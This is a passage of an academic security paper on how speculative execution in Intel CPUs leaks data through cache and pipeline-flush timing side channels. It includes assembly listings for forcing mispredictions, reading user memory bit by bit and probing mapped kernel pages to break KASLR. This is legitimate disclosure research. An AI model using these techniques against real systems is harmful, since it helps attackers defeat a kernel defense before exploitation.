SPECULOSE: Analyzing the Security Implications of Speculative Execution in CPUs

Giorgi Maisuradze and Christian Rossow
CISPA, Saarland University, Saarland Informatics Campus
[email protected], [email protected]

Abstract—Whenever modern CPUs encounter a conditional branch for which the condition cannot be evaluated yet, they predict the likely branch target and speculatively execute code. Such pipelining is key to optimizing runtime performance and has been incorporated in CPUs for more than 15 years. In this paper, to the best of our knowledge, we are the first to study the inner workings and the security implications of such speculative execution. We revisit the assumption that speculatively executed code leaves no traces in case it is not committed. We reveal several measurable side effects that allow adversaries to enumerate mapped memory pages and to read arbitrary memory—all using only speculated code that was never fully executed. To demonstrate the practicality of such attacks, we show how a user-space adversary can probe for kernel pages to reliably break kernel-level ASLR in under three seconds and reduce the Windows 10 KASLR entropy by 18 bits in less than a second.

Disclaimer: This work on speculative execution was conducted independently from other research groups and was submitted to IEEE S&P '18 in October 2017. Any techniques and experiments presented in this paper predate the public disclosure of attacks that became known as Meltdown [25] and Spectre [22] and that were released in early January 2018.

I. INTRODUCTION

Being at the core of any computing system, CPUs have always strived for maximum execution efficiency. Several hardware-based efforts have been undertaken to increase CPU performance by higher clock frequencies, increasing the number of cores, or adding more cache levels.
Orthogonal to such developments, vendors have long invested in logical optimization techniques, such as complex cache eviction algorithms, branch predictors, or instruction reordering. These developments made clear that CPUs do not represent hardware-only components any longer. Yet our level of understanding of the algorithmic, i.e., software-side aspects of CPUs is in its infancy. Given that many CPU design details remain corporate secrets, it requires tedious reverse engineering attempts to understand the inner workings of CPUs [23].

In this paper, we argue that this is a necessary direction of research and investigate the security implications of one of the core logical optimization techniques that is ubiquitous in modern CPUs: speculative execution. Whenever facing a conditional branch for which the outcome is not yet known, instead of waiting (stalling), CPUs usually speculate on one of the branch targets. This way, CPUs can still fully leverage their instruction pipelines. They predict the outcome of conditional branches and follow the more likely branch target to continue execution. Upon visiting a particular branch for the first time, CPUs use static prediction, which usually guesses that backward jumps (common in loops to repeat the loop body) are taken, whereas forward jumps fall through (common in loops so as not to abort the loop). Over time, the CPU will learn the likely branch target and then use dynamic prediction to take the more likely target. When a CPU discovers that it mispredicted a branch, it will roll back the speculated instructions and their results. Despite this risk of mispredictions, speculative execution has significantly sped up CPU performance and is part of most modern CPUs of the popular vendors Intel, AMD, or ARM licensees.

To the best of our knowledge, we are the first to analyze the security implications of speculative execution. So far, the only known drawback of speculative execution is a slightly higher energy consumption due to non-committed instructions [27]. As we show, its drawbacks go far beyond reduced energy efficiency. Our analysis follows the observation that CPUs, when executing code speculatively, might leak data from the speculated execution branch, although this code would never have been executed in a non-speculative world. Ideally, speculated code should not change the CPU state unless it is committed at a later stage (e.g., because the predicted branch target was confirmed). We analyze how an adversary might undermine this assumption by causing measurable side effects during speculative execution. We find that at least two feedback channels exist to leak data from speculative execution, even if the speculated code, and thus its results, are never committed. Whereas one side channel uses our observation that speculated code can change cache states, the other side channel observes differences in the time it takes to flush the instruction pipeline.

With these techniques at hand, we then analyze the security implications of the possibility to leak data from within speculative execution. We first show how a user-space attacker can abuse speculative execution to reliably read arbitrary user-space memory. While this sounds boring at first, we then also discuss how that might help an attacker to access memory regions that are guarded by conditionals, such as in sandboxes. We then analyze if an unprivileged user can use speculation to read even kernel memory. We show that this attack is fortunately not possible. That is, speculative execution protects against invalid reads in that the results of access-violating reads (e.g., from user to kernel) are zeroed.

This observation, however, leads us to discover a severe side channel that allows one to distinguish between mapped and unmapped kernel pages. In stark contrast to access-violating memory reads (which are zeroed), page faults (i.e., accesses to non-mapped kernel pages) stall the speculative execution. We show that an attacker can use this distinction to reliably and efficiently determine whether a kernel page is mapped. This effectively undermines a fundamental assumption of kernel-based Address Space Layout Randomization (KASLR) designs [10] present in modern OSes (Windows 8.x+, Linux kernel 4.4+, iOS 4.3+, Android 8.x): KASLR's foremost goal is to hide the location of the kernel image, which is easily broken with speculative execution. Access violations in speculative execution—in contrast to violations in non-speculated execution—do not cause program crashes due to segmentation faults, allowing one to easily repeat checks in multiple memory ranges.
In our experiments, we use commodity hardware to show that one can reliably break KASLR on Ubuntu 16.04 with kernel 4.13.0 in less than three seconds.

In this paper, we provide the following contributions:

• To the best of our knowledge, we are the first to explore the internals of speculative execution in modern CPUs. We reveal details of branch predictors and speculative execution in general. Furthermore, we propose two feedback channels that allow us to transfer data from speculation to normal execution. We evaluate these primitives on five Intel CPU architectures, ranging from models from 2004 to recent CPU architectures such as Intel Skylake.

• Based on these new primitives, we discuss potential security implications of speculative execution. We first present how to read arbitrary user-mode memory from inside speculative execution, which may be useful to read beyond software-enforced memory boundaries. We then extend this scheme to a (failed) attempt to read arbitrary kernel memory from user space.

• We discover a severe side channel in Intel's speculative execution engine that allows us to distinguish between a mapped and a non-mapped kernel page. We show how we can leverage this concept to break KASLR implementations of modern operating systems, prototyping it against the Linux kernel 4.13 and Windows 10.

• We discuss potential countermeasures against the security degradation caused by speculative execution, ranging from hardware- and software- to compiler-assisted attempts to fix the discovered weaknesses.

II. ANALYSIS OF SPECULATIVE EXECUTION IN X86

In this section, we first provide an overview of the basic x86 architecture in general. We then introduce the concept of speculative execution and its implementation details in recent x86 microarchitectures such as Haswell and Skylake. To understand the inner workings of speculative execution, this section also describes the details of the branch prediction techniques that are used by modern processors.

These inner details allow for an attack that abuses speculative execution to break kernel-level Address Space Layout Randomization (KASLR). This section therefore also introduces KASLR, an in-kernel defense mechanism deployed in most modern operating systems. To emphasize the importance of KASLR, we will show a wide range of kernel attacks that are possible in the absence of KASLR. Later, in Section IV, we will combine branch prediction and speculative execution to anticipate the speculatively executed path after a conditional branch. This will be a key to executing arbitrary code speculatively, which we will use in our attack to remove the randomness introduced by KASLR.

A. Generic x86 Architecture

Despite being a CISC (Complex Instruction Set Computing) architecture, x86¹ constitutes the prevalent architecture used for desktop and server environments. Extensive optimizations are among the reasons for x86's popularity.

¹ Note that we will refer to both IA-32 (32-bit CPUs) and AMD64/Intel 64 (64-bit CPUs) as x86 for simplicity.

Realizing the benefits of RISC (Reduced Instruction Set Computing) architectures, both Intel and AMD have switched to RISC-like architectures under the hood. That is, although still providing a complex instruction set to programmers, internally the complex instructions are translated into sequences of simpler RISC-like instructions. These high-level and low-level instructions are usually called macro-OPs and micro-OPs, respectively. This construction brings all the benefits of a RISC architecture and allows for simpler constructions and better optimizations, while programmers can still use a rich CISC instruction set. An example of translating a macro-OP into micro-OPs is shown in the following:

1                  load  t1, [rax]
2 add [rax], 1  => add   t1, 1
3                  store [rax], t1

Using micro-OPs requires way less circuitry in the CPU for their implementation. For example, similar micro-OPs can be grouped together into execution units (also called ports). Such ports allow micro-OPs from different groups to be executed in parallel, given that one does not depend on the results of another. The following is an example that can trivially be run in parallel once converted into micro-OPs:

1 mov [rax], 1
2 add rbx, 2

Both instructions can be executed in parallel. Whereas instruction #1 is executed in the CPU's memory unit, instruction #2 is computed in the CPU's arithmetic logic unit (ALU)—effectively increasing the throughput of the CPU. Based on the availability of their corresponding execution ports and the source data, each of these instructions could also be executed out of order. In the previous example, the CPU could easily swap the order of the addition and the memory operation, as there are no dependencies between them.
Such reordering frequently allows optimizing a sequence of instructions for speed and data locality. Given the possibility of data dependencies in general, an execution cannot be done entirely out of order, though. Otherwise, such reordering would create data hazards and possibly even result in entirely different executions that do not reflect the macro-OP specification. To capture the complexity of such reordering, CPUs include another unit that maintains the consistency of the executed instructions.
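As a contrasting (hypothetical) example of such a data dependency—ours, not one of the paper's listings—the following pair cannot be swapped, because the second instruction consumes the result of the first, whereas the third instruction is independent and may be reordered around both:

1 mov rax, [rbx]  ; load a value from memory
2 add rcx, rax    ; uses the loaded value -> must execute after line #1
3 inc rdx         ; independent of both -> may be reordered freely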

[Figure 1 (diagram omitted): the fetch/decode stage (BPU, L1 instruction cache, IF/ID decoder, micro-OP cache, micro-OP queue), the execution stage (scheduler, execution ports P0–P7, reorder buffer), and the memory stage (load buffer, store buffer, L1 data cache, L2 cache).]

Fig. 1: CPU Core Pipeline Functionality of the Haswell microarchitecture [18].

1) Execution Units in Modern x86 CPUs: As software changes over time, the underlying logic and hardware setup of CPUs is also subject to change. CPU vendors usually maintain microarchitectures to summarize various CPUs of the same generation, possibly varying in terms of clock speeds or number of cores. We will now describe the basic x86 CPU architecture based on the example of the Haswell microarchitecture, which is a recent Intel x86 microarchitecture and one of the microarchitectures that we will use in our experiments. Although the inner details differ from one microarchitecture to another, the basic building blocks (especially the ones that we use) remain mostly the same.

In Figure 1, we outline the most important parts of the CPU's pipeline, based on the Haswell microarchitecture [18]. We split the whole pipeline into three parts: (i) instruction fetch/decode, (ii) execution, and (iii) memory.

Fetch/Decode Unit: The fetch/decode unit is responsible for fetching the forthcoming (i.e., to-be-executed) instructions and preparing them for execution. There are different places where these instructions might be coming from.
The fastest of these places is a micro-OP cache, which is a storage of instructions that are already decoded into their corresponding micro-OPs. If there is a miss in this cache, then the instruction has to be retrieved from one of the caches in the hierarchy (L1-I, L2, L3, L4), or ultimately, if none of the caches contain the data, from main memory. The fetched instructions are then decoded and passed to the micro-OP queue as well as to the micro-OP cache. The details of how this is handled are not important for the remainder of our paper and we refer the interested reader to the respective CPU vendor documentation [18]. One crucial part to note, though, is that the address of the next instruction to fetch is controlled by the Branch Prediction Unit (BPU).

Execution: After decoding the instructions into their corresponding micro-OPs, they are put on the instruction dispatch queue to prepare for execution. Micro-OPs on the queue are checked for dependencies, and the ones with all source operands resolved are scheduled to one of 8 (in Haswell; varies in other architectures) execution ports. Further, the scheduled micro-OPs are added to the reorder buffer (ROB), which contains the sequentially consistent view of all executed instructions. Abstracting away from its details, it is sufficient for us to imagine the ROB as a unit that keeps micro-OPs in order while executing them out of order. Usually, the ROB is implemented as a ring buffer, with its head pointing to the newest micro-OP and its tail to the oldest not-yet-committed operation. Committing a micro-OP means to reflect the changes that it made to the machine state. Committing micro-OPs is done in order, i.e., a micro-OP can be committed only after it is done executing and all instructions before it are already committed. In contrast, however, finishing the computation does not directly mean that the micro-OP can be committed. A relevant example in our case is speculative execution, in which case a micro-OP can only be committed after the outcome of the speculation is known (i.e., after knowing that the speculated path was correctly predicted). This implies that CPUs have to maintain micro-OPs uncommitted until they can be committed. CPUs typically employ a maximum number of uncommitted/speculated instructions which aligns with the number of ROB entries (192 in Haswell). This limit might be further reduced by the availability of other resources, such as physical registers or available execution ports.

Memory Unit: The third part of the execution pipeline, the memory unit, is used for micro-OPs that access memory. Being the bottleneck in most executions, CPU designers pay special attention to this unit to improve its efficiency. That is the reason why in modern architectures we have a hierarchy of memory caches, each containing different sizes of buffers with varying access speeds. Haswell's memory hierarchy, for example, comprises Load and Store Buffers (72 and 42 entries in Haswell, respectively), followed by various levels of caches (L1-I/L1-D, L2, L3, L4), and finally the main memory. Each load operation is done in the following way:

1) When a load micro-OP is scheduled, a load buffer entry is allocated that will hold the loaded data until it is committed.
2) To retrieve the data, the L1 data cache is queried. In case of a cache hit, the data will be loaded into the load buffer entry of the corresponding micro-OP.
3) In the case of an L1 cache miss, the data will be queried from the higher cache hierarchies or, ultimately, from the main memory.

Executing a memory load thus involves two buffers. First, a load buffer entry is allocated which will be tied to the corresponding load micro-OP, and will hold the loaded data after it is returned from the L1 data cache. Second, in the case of a cache miss, the L1 data cache has to load the missing data from the higher memory hierarchy. To service multiple cache misses in parallel, the L1 data cache has its own buffer consisting of memory accesses that have to be resolved. Haswell, e.g., has a 32-entry buffer and can handle 32 cache misses² in parallel.

² Note that in reality even cache hits will allocate entries in the buffer; however, as cache hits are serviced instantaneously, they can be ignored.

Executing load micro-OPs speculatively means that new load buffer entries will be allocated for each of them; however, they will not be freed until the CPU is done speculating. As commits are not carried out until the result of the speculation is known, the loaded data can neither reach the architectural register nor be discarded yet. This means that while speculating, the maximum number of load instructions that can be executed is limited by the size of the load buffer. After reaching this limit, the execution of subsequent load micro-OPs will be stalled.
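To illustrate why both buffer sizes matter, consider the following hypothetical snippet (ours, not from the paper): the first three loads are independent, so their cache misses can be serviced in parallel (up to the 32-entry miss buffer in Haswell), whereas the pointer-chasing loads below them serialize, because each address only becomes known once the previous miss resolves.

1 mov rax, [rsi]       ; three independent loads:
2 mov rbx, [rsi+4096]  ; their misses can be
3 mov rcx, [rsi+8192]  ; serviced in parallel
4 mov rdx, [rdi]       ; pointer chasing: each load depends on
5 mov rdx, [rdx]       ; the previous one, so the misses are
6 mov rdx, [rdx]       ; serviced strictly one after another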

Given the generous sizes of load buffers in recent microarchitectures (72 entries in Haswell), for most programs this will not be an issue. However, we will use this limitation to our advantage when measuring the access times of mapped/unmapped memory accesses in Section IV-F. Also worth noting here is the case of cache misses in the L1 data cache. As we previously mentioned, there is a limited number of ongoing cache misses that can be handled by the L1 data cache (32 in Haswell). This, combined with the fact that faults cannot be handled speculatively, means that after having 32 faulty cache misses (e.g., cache misses resulting in page faults), all subsequent memory operations will be stalled.

2) Speculative Execution: Speculative execution is an important optimization carried out by most CPU architectures. Programs generally have many conditional branches. Evaluating the condition in a conditional branch might take some time (e.g., reading data from memory, which can take hundreds of cycles if it comes from main memory). Instead of waiting for a branch condition to be evaluated, the CPU speculates on the outcome and starts speculatively executing the more likely execution path. Once the condition for the branch can be evaluated, this results in two possible scenarios:

1) The prediction was correct → The speculatively executed instructions were correct and thus will now be committed.
2) The prediction was wrong → The speculatively executed instructions are flushed and the correct path is executed from the beginning (non-speculatively).

Optimizing the correctness of branch prediction is thus of utmost importance for performance. Perfect prediction means that the CPU never has to wait for slow branches and will always execute the correct path. In contrast, mispredictions penalize the execution by forcing the CPU to flush all the progress it has made since the speculation started and to start over from scratch.

B. Branch Prediction

As the efficacy of branch predictors directly influences the performance of CPUs, hardware vendors have improved predictors over time. Therefore, branch predictors not only differ from vendor to vendor, but also between different generations of microarchitectures (e.g., Haswell vs. Skylake). The basic principle is the same: branch predictors try to foresee the outcome of conditional branches. There are generally two types of predictors, static and dynamic. When a CPU sees a conditional branch for the first time, it has to resort to a static predictor to guess the outcome based on simple expert-knowledge heuristics. In contrast, if the branch has been executed previously, a dynamic predictor can make more informed decisions by looking at previous branch outcomes.

The simplest example of a static predictor would be predicting any branch to be either always taken or never taken. However, intuitively, these predictors are not highly precise. The most widely used static predictor, which also exists in most modern CPUs, is called BTFNT (backwards taken, forwards not taken). As its name suggests, this static predictor predicts forward branches not to be taken and backward branches to be taken. The reasoning is that loops (i.e., backward jumps) are usually taken more than once, and that the first case of a conditional (i.e., the fall-through case of a forward jump) is more likely to be taken. The success rate of the predictor can be further improved by the compiler, which aligns the cases of conditionals according to the static predictions of the underlying hardware.

The simplest example of a dynamic branch predictor is a one-bit history predictor, which stores a single bit for each branch instruction. This bit denotes whether the branch was taken or not in the previous execution. Most CPUs are believed³ to have 2-bit predictors (also called 2-bit saturating counters) [37]. These two bits represent a counter that is incremented every time the branch is taken and decremented otherwise. To decide the outcome of the predictor, the values of the counter {0, 1, 2, 3} are mapped to the decisions {strongly not-taken, weakly not-taken, weakly taken, strongly taken}. Apart from simple history matching, dynamic predictors can also detect cycles or nested branches, e.g., by using local or global history bits or even combining them together. However, dynamic branch predictors are out of the scope of this paper and therefore we will not go into more detail here.

³ Branch predictor details are not part of official vendor documentation.
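Formally, with counter value c ∈ {0, 1, 2, 3}, the standard update and decision rules of such a saturating counter (a textbook formulation consistent with the mapping above) are:

  c ← min(c + 1, 3)  if the branch was taken
  c ← max(c − 1, 0)  otherwise

  predict taken  ⇔  c ≥ 2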
In the following, we will use static predictors, as they show a relatively coherent behavior across different CPUs, making it possible to reliably anticipate their outcome. For example, if a CPU sees a forward conditional branch at address A for the first time, the static branch predictor will predict the branch to be not taken (according to BTFNT). In principle, the same thing can also be done with dynamic predictors by training them at the beginning and then taking the opposite branch of what the trained predictor expects.

C. Kernel ASLR

With this basic CPU knowledge, we now turn to ASLR, a defense mechanism whose underlying assumptions an adversary can undermine with speculative execution. Address Space Layout Randomization (ASLR) [33] is a widely deployed defense technique against code-reuse attacks. In user space, ASLR randomizes the base addresses of the program's memory segments, thus preventing the attacker from knowing or predicting the addresses of gadgets that she needs for code-reuse attacks. ASLR is applied to a program at load time and whenever a program requests a new memory allocation. ASLR raises the bar for adversaries in doing successful exploitation, and is thus supported by all modern operating systems.

The recent shift of attack targets towards the kernel side [16], [20], [28], [30], [32] motivated operating system developers to create similar countermeasures against code-reuse attacks for kernel code. This resulted in KASLR (Kernel ASLR), which is an ASLR implementation for the kernel, i.e., randomizing the kernel's image base address as well as its loaded modules/drivers and allocated data. While historically the kernel image was loaded at a fixed address (e.g., 0xffffffff80000000 in Linux), with KASLR, the kernel is placed at a different address at boot time. KASLR is supported by all major operating systems: Windows (from Vista), OS X (from Mountain Lion 10.8), and Linux (from 3.14, and enabled by default from 4.12). KASLR is meant (1) to protect against remote attackers, and (2) as a defense against attacks from local adversaries. In our KASLR derandomization attack, we assume the latter case, i.e., the attacker tries to reveal the location of critical kernel functions in order to use this knowledge in a subsequent exploitation.

Windows KASLR: KASLR implementations differ between OSes, or even among different versions of the same OS. In general, at every boot, the kernel image and the loaded modules/drivers are allocated at random addresses. In Windows 10 (version 1709), there is a dedicated kernel memory region in the range from 0xfffff80000000000 to 0xfffff88000000000, containing allocation slots of 2MiB each (i.e., large pages). KASLR will then randomly assign these slots to the kernel image and to the loaded modules, resulting in 262144 possible slots where the kernel image can reside, i.e., 18 bits of randomness.

Linux KASLR: In Linux, KASLR randomly chooses the page from which to start loading the kernel image. By default, the size of this page is 2MiB, and the range in which the randomization can happen is from 0xffffffff80000000 to 0xffffffffc0000000. This gives at most 512 possible kernel image start pages (minus the image size itself), i.e., 9 bits of randomness. The dedicated memory range of the kernel image is followed by a memory region for kernel modules. It starts at 0xffffffffc0000000 and can go as far as 0xfffffffffd200000. However, only the load offset is randomized, i.e., the first loaded module will be loaded at a randomly chosen 4KiB page from the range [1,1024]. All consecutively loaded modules will then follow the first one, giving in total 10 bits of randomness.
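These entropy figures follow directly from the sizes of the randomization ranges and their alignment (a quick check of the stated numbers):

  Windows 10: (0xfffff88000000000 − 0xfffff80000000000) / 2 MiB = 2^39 / 2^21 = 2^18 = 262144 slots, i.e., 18 bits.
  Linux:      (0xffffffffc0000000 − 0xffffffff80000000) / 2 MiB = 2^30 / 2^21 = 2^9  = 512 slots, i.e., 9 bits.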
III. THREAT MODEL

This section details our threat model and the assumptions we make about the attack environment. Our threat model assumes a local attacker and is in accordance with the threat model of other attacks against KASLR [12], [14], [17], [19]. More specifically, we envision the following scenario:

1) An attacker can already execute arbitrary code on the victim's system in user mode without elevated privileges. This means that either the attacker is running her own executable as a local user on the machine, or she can inject arbitrary code into an already running user program.
2) The attacker knows an exploitable kernel vulnerability and aims to abuse this vulnerability to elevate her privileges. For example, a vulnerability could allow her to hijack the kernel's control flow (if the attacker knows the precise memory location of the kernel).
3) We assume the OS deploys KASLR, which mitigates such exploitation attempts by randomizing the kernel's image base address. This implies that there is no other way to leak address space information from the kernel that would otherwise undermine KASLR.
4) Given that a naïve trial-and-error search would crash the kernel, we assume that the attacker cannot just brute-force kernel addresses.

IV. POTENTIAL ABUSES OF SPECULATIVE EXECUTION

A key observation of our analysis in Section II is that in case of a branch misprediction, the CPU has been executing a set of instructions that it was actually not supposed to execute. We will now outline techniques where an attacker can abuse speculative execution to leak certain information (e.g., memory content, mapped pages), ultimately compromising fundamental assumptions of KASLR in Linux and Windows. First, we will provide an overview of the basic approach and show several code patterns that allow abuse of speculative execution as a potential side channel. We will then discuss how an attacker could use these techniques to identify the memory region of a KASLR-protected kernel.

A. Enforced Speculative Execution

If we trick the CPU into a branch misprediction, it will speculatively execute code that was not actually meant to be executed. But: how can we force the CPU to enter code parts that we want to execute speculatively? To execute a piece of code speculatively, we first have to ensure that the branch condition takes "long" to evaluate, while in the meantime the code after the conditional jump is executed in parallel. To slow down the branch condition computation, we propose to fill up a port of the CPU with many computations that the condition has to wait for before it can be evaluated. For the remainder of this paper, we will use integer multiplications (imul reg32,imm32) to compute an input for a conditional branch. The imul instruction multiplies register reg by the immediate imm and stores the result in reg. In our example, several (we use 2048 in the remainder of this paper) subsequent imul instructions will fill the multiplication port.

In addition, we have to make sure that the condition and the speculated code are not scheduled on the same execution ports. Otherwise, there will be no free execution units to run the speculated code. For example, if we want to use memory reads (mov reg32,mem32) within speculative execution, these instructions will be scheduled on memory load ports (5 & 6 in Haswell). While ports may slightly differ between architectures, they (and thus the described procedure) are relatively stable and well-documented in vendor manuals [18].

1 imul r9, 3    ; Repeat imul to fill
2 ...           ; the ALU's queue
3 imul r9, 3    ;
4 cmp r9b, 3    ; Requires imul result
5 je C1True     ; and has to speculate
6 << ... >>     ; Code that is executed
7 << ... >>     ; speculatively
8 jmp Exit
9 C1True:
10 << ... >>
11 Exit:

Listing 1: Code pattern to trigger speculative execution via static prediction (BTFNT) of the conditional jump in line 5

Listing 1 outlines the basic idea. We first fill a port with many imul instructions that depend upon each other (lines #1–#3). The compare instruction (line #4) has to wait for the result of this multiplication chain, while the CPU speculates that the conditional forward jump (line #5) is not taken. This code pattern thus allows us to (speculatively) execute arbitrary code (placeholders in lines #6–#7) that would never have been executed without speculation. In all our experiments, the initial value of r9 is 3. Therefore, after multiplying it 2048 times by 3, the least significant byte of r9 will be 3^(2048+1) mod 256 = 3, i.e., the outcome of the conditional jump (line #5) was mispredicted.
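A quick sanity check of this arithmetic (our derivation): the multiplicative order of 3 modulo 256 is 64, i.e., 3^64 ≡ 1 (mod 256). Since 2049 = 32 · 64 + 1, it follows that

  3^2049 ≡ 3^1 ≡ 3 (mod 256),

so r9b again equals 3, the comparison in line #4 evaluates to true, and the statically predicted fall-through path (lines #6–#7) is indeed the mispredicted one.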

When executing this code several times, the dynamic branch predictor will kick in and correctly predict the outcome. To avoid this, we use ASLR, i.e., we re-run the program after each execution, which will re-randomize the base address of the executable and thus the address for which the prediction is stored. This forces the static predictor to make the decision again. If an OS does not randomize the base address (either for lack of ASLR, or because of ASLR randomization at boot time, such as in Windows), we have to search for alternative solutions. One (that we will use later) is writing a larger probe program that runs several speculative executions in a batch and thus needs to be called only once. This leaves dynamic prediction no chance, but allows executing long code speculatively. Another solution would be to manually unlearn the prediction result. This could, e.g., be done by running the program with inverted conditionals several times before calling it with the actual conditionals—thereby enforcing the dynamic predictor to mispredict.

B. Feedback Channel from Speculation

While we explained how speculative execution can be enforced, we will now discuss how any computations done in speculation can feed back data to the outside (non-speculated) execution. We face a natural challenge: as soon as the CPU identifies a misprediction, it flushes (reverts) the mispredicted branch and thus does not commit its results. That is, without special care, the outside world could not see any effects of speculative execution. This means that we have to find a feedback channel for the data we want to leak during speculative execution. That is, to reason about the outcome of the speculated code, we need to communicate back from the speculative execution to the non-speculated execution flow of the program.

Although ideally it is not supposed to, we find that speculative execution modifies the CPU state in such a way that it becomes measurable in non-speculated execution. This allows us to leak data from within speculation, although the explicit results of the speculated code have been flushed and are not observable. As direct communication from speculative to regular execution is unfeasible, we have to think of potential side channels. We describe two exemplary feedback channels that we can use for these goals in the following.

1) Caching Side Channel Feedback: Our first feedback channel reads memory inside speculative execution. Such reads store the memory content in the L1 data cache, which can be detected by measuring its subsequent access time from normal execution. This technique can be used to leak a single bit of information per cached line. In the remainder of this paper, we mainly use this approach, as shown in Listing 2.

1 << ... >>      ; slow condition -> ZF=1
2 jz C1True
3 mov rbx,[rax]  ; cache memory at rax
4 jmp Exit
5 C1True:
6 << ... >>      ; real execution
7 Exit:
8 << measure [rax] access time >>
9 << fast when cached, slow otherwise >>

Listing 2: Code fragment for caching feedback channel
2) Conditional Flushing Slowdown Feedback: Our second feedback channel measures the time it takes to recover from mispredicted branches. The core observation here is that the recovery time depends on the state of the pipeline when the flushing occurs. For example, if we consider the code in Listing 3, the time it takes to flush the pipeline will be shorter if we stop the execution (hlt) from inside the speculative execution. This is true even if the executed instructions are simple nops. Note that, as we use caching as our main feedback channel, we have not investigated all possible types of such side-effect-incurring instructions.

1 << ... >>  ; slow condition -> ZF=1
2 << Start Measurement >>
3 jz C1True
4 nop        ; repeat
5 ...        ; nops
6 nop        ; 128 times
7 [hlt]      ; halt the execution
8 jmp Exit
9 C1True:
10 << ... >> ; real execution
11 Exit:
12 << End Measurement >>

Listing 3: Code for conditional flushing slowdown channel

C. Detecting Static Predictor Behavior

We have described in Section II that there are multiple strategies for static predictors. The code in Listing 1, for example, assumes that the CPU statically predicts that forward jumps are not taken. In the following, we outline two tests to reveal the forward jump prediction strategy of a specific CPU. The first test aims to find out if forward jumps are predicted to be taken or not. The code in Listing 4 checks if forward jumps are predicted to be not taken:

1 << ... >>      ; slow condition -> ZF=1
2 je C1True      ; Condition is true
3 C1False:
4 mov rsi,[r11]  ; r11 user address
5 jmp Exit
6 C1True:
7 jmp Exit
8 Exit:
9 << measure [r11] access time >>

Listing 4: Detect forward-not-taken predictor

In the above listed code, the conditional branch (line #2) will eventually evaluate to true, i.e., it will jump to C1True. That is, the repetition of imul before it (line #1) will fill the port such that the condition is not known and speculative execution will be started. If the branch was predicted not to take the forward jump, then the memory read (line #4) will be speculated, caching the value at r11. Checking the access time of the memory at r11 (line #9) reveals the decision, i.e., if the access to r11 is faster than a non-cached access, the predictor uses the fall-through case for forward jumps.

On the other hand, to check if forward jumps are predicted as taken, we can invert the above listed code by inverting the condition of the conditional jump:

1 << ... >>      ; slow condition -> ZF=1
2 jne C1True     ; Condition is false
3 C1False:
4 jmp Exit
5 C1True:
6 mov rsi,[r11]  ; r11 user address
7 jmp Exit
8 Exit:
9 << measure [r11] access time >>

Out of the CPUs that we tested, only the Sandy Bridge microarchitecture seems to predict forward jumps as taken. The others speculate the fall-through case, which is the expected outcome. Note that the prediction behavior is independent of the condition, e.g., both je and jne will be predicted the same (either both jump, or both fall through). For simplicity, all following examples will assume that fall-through cases are speculated. In our experiments (e.g., on Sandy Bridge), we will adjust the branch behavior accordingly.

D. Arbitrary Memory Read

We now try to abuse speculative execution to read arbitrary memory that should not be accessible during normal (committed) execution. The basic idea is as follows: in speculative execution we check the memory content at a specified address, and report the result back using one of the feedback channels described in Section IV-B. To leak an arbitrary byte in memory, we use several test instructions to leak the byte bit by bit, i.e., it takes 8 checks to read a byte from memory.

1 << ... >>      ; slow condition -> ZF=1
2 je C1True      ; Taken
3 C1False:
4 ; --- START of SPECULATION ---
5 mov r10b, BYTE PTR [r10]
6 test r10b, 1   ; test 1st bit
7 jz C2True
8 C2False:       ; 1st bit is 1
9 jmp Exit       ; Lvl2 Speculation
10 C2True:       ; 1st bit is 0
11 mov rsi,[r11] ; cache mem @ r11
12 jmp Exit
13 ; --- END of SPECULATION ---
14 C1True:
15 << ... >>
16 Exit:
17 ; if [r11] is cached:
18 ;   1st bit of [r10] = 0
19 ; else:
20 ;   1st bit of [r10] = 1

Listing 5: Arbitrary memory read via nested speculation

Listing 5 shows the code that we can use to read one bit of arbitrary memory. In this example, we want to read a value that is located at address r10: While the multiplication results are being evaluated (line #1), C1False is executed speculatively. Inside, we read the byte stored at the target address (r10) into register r10b (line #5). Based on the least significant bit of the read value, we make the decision to either jump to C2False or C2True. Until the memory at r10 (line #5) is read, C2False (line #8) will be run in nested speculation—regardless of the pending test result (line #6). Assuming that the memory read (the condition for second-level speculation) is faster than the sequence of multiplications (the condition for first-level speculation)⁴, the outcome of the second branch condition will be known sooner than the first one. Once the test result and thus the condition of the second conditional jump (line #7) is known, the second-level speculation will be flushed. The CPU will then start to execute the correct jump target (line #10). Note that this does not flush the first-level speculation (that started in line #3). Therefore, C2True, which caches the feedback address r11 (line #11), is executed only in the case that the read memory has 0 for its least significant bit. The side effects of caching r11 can be easily detected from outside the speculative execution (line #16), when the multiplication result is finally known and the speculated paths are flushed.

⁴ We verify this assumption as part of our experiments.

By repeating this code snippet with different bit offsets to test, we can leak entire bytes or memory ranges. Technically, we need to flush the feedback address r11 from the cache so that we can start fresh measurements, e.g., using clflush.
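Between two probes, such a reset could look as follows (our sketch; the mfence is an assumption we add to order the eviction, it is not part of the original listings):

1 clflush [r11]  ; evict the feedback address from the cache hierarchy
2 mfence         ; ensure the eviction completes before the next probe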

E. Arbitrary Kernel-Space Memory Read (But...)

Being able to read arbitrary user memory might have some interesting use cases, even for local attackers who seemingly can already read arbitrary memory (for a discussion see Section VI). Following our threat model of a user-space attacker, the immediate follow-up question now is: can we even read memory in regions for which we do not have privileges?

In our second experiment we thus aim to read privileged memory in kernel land as an unprivileged user. In other words, we want to check if privilege separation between user and kernel was taken into account also during speculative execution. To this end, we ran the code from Listing 5 with the probe address pointing to a kernel address. After running the code on various microarchitectures, much to our surprise, we saw that the code was being executed and the kernel memory was read. However, the values that we read were not the true values we expected. More specifically, we observed that instead of getting the actual content of the memory, we would read 0s for all read kernel addresses. This is good news in that an arbitrary kernel memory read is not possible from user space, which would be a complete disaster for security.

Interestingly, however, our measurement results differed completely when we tried to read the values of kernel-land virtual addresses that did not map to any physical page. In such a case, the execution of the corresponding micro-OP would stop, together with the micro-OPs that use the value read from it. For example, if we read from a non-mapped address into a register rax, using rax anywhere in subsequent instructions as a source operand will stall their execution. This leads to a clear distinction between an access violation, which results in a 0 being read, and a page fault (e.g., when the memory page is not mapped), in which case the entire execution stalls. An attacker can use this side channel to distinguish between mapped and unmapped kernel pages: if a byte read from the kernel is 0, the page was mapped; otherwise the page was not mapped. To check if a kernel address K is mapped or not, we use the code from Listing 5 with the exception that we now check for the memory content to be 0. The assembly code for it is displayed in Listing 6 (r10 is K).

1 << ... >>      ; slow condition -> ZF=1
2 je C1True
3 C1False:
4 ; --- START of SPECULATION ---
5 cmp [r10], 0   ; r10 = K
6 jz C2True
7 C2False:       ; page is not mapped
8 jmp Exit
9 C2True:        ; page is mapped
10 mov rsi,[r11] ; r11 user address
11 jmp Exit
12 ; --- END of SPECULATION ---
13 C1True:
14 jmp Exit
15 Exit:
16 << measure [r11] access time >>

